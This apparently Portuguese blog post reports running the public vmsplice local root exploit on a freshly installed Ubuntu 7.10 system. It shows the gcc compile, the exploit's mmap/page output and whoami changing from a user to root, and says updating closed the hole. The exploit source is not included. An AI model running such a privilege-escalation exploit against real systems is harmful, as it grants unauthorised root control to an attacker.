Esse exploit afeta o Kernel versão 2.6 (2.6.17 - 2.6.24) de ubuntu e debian, o exploit precisa ser executado como usuario local, para conseguir ROOT
Ao terminar de instalar o ubuntu 7.10 compilei o exploit e charam! Funcionou!
Atualizei e não ficou mais vulnerável.
$ gcc exploit.c -o exploit
$ whoami
heikki
$ ./exploit
——-
——- ——- ——- ——-
Linux vmsplice Local Root Exploit
By qaaz
——-——- ——- ——- ——-
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
Nenhum comentário:
Postar um comentário